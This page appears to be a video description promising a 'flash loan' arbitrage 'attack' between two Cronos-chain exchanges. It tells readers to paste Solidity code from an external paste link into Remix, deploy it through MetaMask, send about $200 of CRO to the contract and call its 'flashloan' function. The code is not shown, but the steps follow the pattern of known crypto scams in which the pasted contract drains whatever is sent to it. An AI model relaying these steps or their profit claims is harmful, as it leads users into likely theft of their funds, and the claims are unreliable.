Crypto.com - CRO Cronos Chain: How to setup a Multi DEX arbitrage attack with Solidity.

2 years ago
15

Today I will show you how to setup a arbitrage attack using two DEX's; CroDex and VVS Finance. First make sure metamask is connected to Cronos chain and you have some CRO to cover gas fees....

BRAND NEW FLASH LOAN CONTRACT CODE :

PLEASE FOLLOW THE VIDEO CAREFULLY IN ORDER TO WORK!!

REMEMBER : In Deploy & Run Transactions, Select Injected Web3 in Environment dropdown menu to connect your MetaMask, otherwise it will not work.

***Note: CRO must be withdrawn to ‘Cronos Chain’. which is EVM/Metamask compatible chain

Setup Metamask to connect to Cronos Mainnet – https://cronos.crypto.org/docs/getting-started/metamask.html#connecting-to-the-cronos-mainnet-beta

Smart Contract Code Link – https://ghostbin.com/GPdGH/raw

Remix Link – http://remix.ethereum.org/

CroDex - https://swap.crodex.app/

VVS Finance - https://vvs.finance/

Arbitrage Explanation - https://academy.binance.com/en/articles/what-is-arbitrage-trading

STEPS:

Before starting, install and setup MetaMask in Chrome Browser.

1. Open and setup Remix in browser (https://remix.ethereum.org)

2. Copy the Contract code (https://ghostbin.com/GPdGH/raw)

3. Create new file in Remix and paste Contract code and wait for everything to load, Go to Solidity Compiler and Select compiler to 0.5.0+commit version and hit Compile.

4. In Deploy & Run Transactions, Select Injected Web3 in Environment dropdown menu to connect your MetaMask. On Deploy, Enter your token details and deploy the contract

5. Get the Contract address from Remix

6. Send 200$ish of CRO to the contract for gas fee for all swaps (There are going to be many swaps to use all funds from out liquidity pools.

7. Call ‘flashloan’ function in Remix.

Loading comments...